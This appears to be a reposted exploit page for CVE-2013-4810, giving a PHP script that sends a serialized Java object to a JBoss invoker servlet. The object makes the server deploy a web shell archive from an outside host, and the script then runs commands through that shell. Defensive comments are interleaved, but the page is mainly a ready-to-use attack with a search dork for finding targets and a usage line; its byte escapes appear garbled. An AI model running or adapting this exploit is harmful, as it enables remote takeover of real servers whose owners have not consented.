[CVE:2013-4810]Apache Tomcat/JBoss远程命令执行

  1 <?php
  2 
// Target and command are taken straight from the CLI; nothing validates
// argc here, so a missing argument only surfaces later as a notice/TypeError.
$host=gethostbyname($argv[1]);
$port=$argv[2];
$cmd=$argv[3];


//small jsp shell
//change this if you want, url to the app to be deployed, keep it short
// NOTE(review): from a defender's point of view this is the key indicator of
// compromise — the application server is made to fetch an archive from an
// external URL, so an outbound HTTP request from a JBoss host to an unknown
// origin shortly after a hit on /invoker/* is what to alert on.
$url="http://retrogod.altervista.org/a.war?"; 


// Big-endian 16-bit length of $url (pack "n"); presumably the length prefix
// the serialized string field expects — it is spliced in right before $url
// in $frag_iii below.
$url_len=pack("n",strlen($url));
 14 
 15 function hex_dump($data, $newline="
") { 
 16 static $from = '';   
 17 static $to = '';    
 18 static $width = 16; static $pad = '.';  
 19  if ($from==='')   {     
 20      for ($i=0; $i<=0xFF; $i++)  { 
 21          $from .= chr($i);       
 22          $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;   
 23      }   
 24  }    
 25 $hex = str_split(bin2hex($data), $width*2);   
 26 $chars = str_split(strtr($data, $from, $to), $width);    
 27 $offset = 0;   
 28 foreach ($hex as $i => $line)   {     
 29     echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline;    
 30    $offset += $width;   
 31   } 
 32 } 
 33 
// Serialized Java object stream, split into fragments so that the length of
// $frag_iii and the deployment URL can be spliced in. The ASCII columns on
// the right show what the bytes spell out: an org.jboss.invocation.
// MarshalledInvocation carrying a javax.management.ObjectName of
// jboss.system:service=MainDeployer and the operation name "deploy", with
// $url as its string argument.
// Security note: the invoker servlet deserializes this blob directly from
// the request body, which is the root cause — filtering payload bytes is
// not a fix; removing or access-controlling the /invoker/* servlets is.
$frag_i=
"xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73". // ....sr.) org.jbos
"x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72". // s.invoca tion.Mar
"x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f". // shalledI nvocatio
"x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77". // n...'A>. ....xppw
"x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76". // .x..G..S .sr..jav
"x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2". // a.lang.I nteger..
"xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75". // .....8.. .I..valu
"x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e". // exr..jav a.lang.N
"x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00". // umber... ........
"x78x70x26x95xbex0ax73x72x00x24x6fx72x67x2ex6ax62". // xp&...sr .$org.jb
"x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d". // oss.invo cation.M
"x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc". // arshalle dValue..
"xe0xd1xf4x4axd0x99x0cx00x00x78x70x77";

// Single byte placed between the two length fields in $data below.
$frag_ii="x00";

// Inner stream: the ObjectName, the "deploy" operation and the URL argument.
$frag_iii=
"xacxedx00x05x75x72x00x13x5bx4cx6ax61x76x61x2e".     // .....ur. .[Ljava.
"x6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9f". // lang.Obj ect;..X.
"x10x73x29x6cx02x00x00x78x70x00x00x00x04x73x72x00". // .s)l...x p....sr.
"x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6dx65x6e". // .javax.m anagemen
"x74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03xa7x1b". // t.Object Name....
"xebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62x6fx73". // .m.....x pt.!jbos
"x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69x63x65". // s.system :service
"x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78x74x00". // =MainDep loyerxt.
"x06x64x65x70x6cx6fx79x75x71x00x7ex00x00x00x00x00". // .deployu q.~.....
"x01x74".
$url_len.   // 2-byte big-endian length of the URL string that follows
$url.
"x75x72x00".
"x13x5bx4cx6ax61x76x61x2ex6cx61".                         // ur..[ Ljava.la
"x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1d". // ng.Strin g;..V...
"x7bx47x02x00x00x78x70x00x00x00x01x74x00x10x6ax61". // {G...xp. ...t..ja
"x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67";

// Trailer: InvocationKey / InvocationType entries and a second copy of the
// MainDeployer ObjectName (see the ASCII column).
$frag_iv=
"x0dxd3". 
"xbexc9x78x77x04x00x00x00x01x73x72x00x22x6fx72x67". // ..xw.... .sr."org
"x2ex6ax62x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6f". // .jboss.i nvocatio
"x6ex2ex49x6ex76x6fx63x61x74x69x6fx6ex4bx65x79xb8". // n.Invoca tionKey.
"xfbx72x84xd7x93x85xf9x02x00x01x49x00x07x6fx72x64". // .r...... ..I..ord
"x69x6ex61x6cx78x70x00x00x00x05x73x71x00x7ex00x05". // inalxp.. ..sq.~..
"x77x0dx00x00x00x05xacxedx00x05x70xfbx57xa7xaax78". // w....... ..p.W..x
"x77x04x00x00x00x03x73x71x00x7ex00x07x00x00x00x04". // w.....sq .~......
"x73x72x00x23x6fx72x67x2ex6ax62x6fx73x73x2ex69x6e". // sr.#org. jboss.in
"x76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61x74". // vocation .Invocat
"x69x6fx6ex54x79x70x65x59xa7x3ax1cxa5x2bx7cxbfx02". // ionTypeY .:..+|..
"x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00". // ..I..ord inalxp..
"x00x01x73x71x00x7ex00x07x00x00x00x0ax70x74x00x0f". // ..sq.~.. ....pt..
"x4ax4dx58x5fx4fx42x4ax45x43x54x5fx4ex41x4dx45x73". // JMX_OBJE CT_NAMEs
"x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6d". // r..javax .managem
"x65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03". // ent.Obje ctName..
"xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62". // ...m.... .xpt.!jb
"x6fx73x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69". // oss.syst em:servi
"x63x65x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78". // ce=MainD eployerx
"x78";                                                             // x

// Final body: $frag_iii is framed by two length fields — a little-endian
// 16-bit value (pack "v") of its length plus 8, then $frag_ii, then the
// big-endian 16-bit length (pack "n") — followed by the trailer.
$data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv;
 93 
 94 //$pk=""POST /invoker/JMXInvokerServlet/ HTTP/1.1
". //the same ...
 95 
// Request 1: the serialized invocation is POSTed to the EJB invoker servlet.
// Detection: a POST to /invoker/EJBInvokerServlet (or, per the commented
// variant above, /invoker/JMXInvokerServlet) with a
// Content-Type of application/x-java-serialized-object, whose body begins
// with the Java serialization magic bytes seen at the head of $frag_i, from
// any client that is not a trusted JBoss peer. The servlet deserializes that
// body before any authentication decision, which is the vulnerability being
// exercised; the fix is to remove or access-control the invoker servlets.
$pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1
".
    "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
".
    "Accept-Encoding: x-gzip,x-deflate,gzip,deflate
".
    "User-Agent: Java/1.6.0_21
".
    "Host: ".$host.":".$port."
".
    "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
".
    "Connection: keep-alive
".
    "Content-type: application/x-www-form-urlencoded
".
    "Content-Length: ".strlen($data)."

".
    $data;
//echo hex_dump($pk)."
";
// The reply is read once and discarded: nothing checks whether the
// deployment actually happened, the script simply waits for it below.
$fp=fsockopen($host,$port,$e,$err,3);
fputs($fp,$pk);
$out=$out=fread($fp,8192);
fclose($fp);
//echo hex_dump($out)."
";

// Fixed delay to give the deployer time to fetch and unpack the remote
// archive named in $url.
sleep(5);

// Request 2: the post-exploitation check-in. A GET for /a/pwn.jsp carrying a
// "cmd" query parameter is the second network signature of this exploit;
// on the host, presumably a new a.war / "a" context appearing in the deploy
// directory is the forensic artefact to look for — confirm against the
// server's deployment layout.
$pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0
".
    "Host: ".$host.":".$port."
".
    "Connection: Close

";

// hex_dump() echoes its own output and returns nothing, so this line prints
// the dump of the request followed by one extra newline.
echo hex_dump($pk)."
";
$fp=fsockopen($host,$port,$e,$err,3);
fputs($fp,$pk);
$out="";
// Read until the server closes the connection ("Connection: Close" above),
// then print the raw response, headers included.
while (!feof($fp)) {
$out.=fread($fp,8192);
}
fclose($fp);
echo $out;
128 ?>

#####################################################
Google 关键字: inurl:status EJBInvokerServlet
利用方法:C:PHP>php exp.php target_ip port cmd

#####################################################

参考:http://www.hack80.com/thread-21814-1-1.html
https://www.exploit-db.com/exploits/28713/
原文地址:https://www.cnblogs.com/sevck/p/4978901.html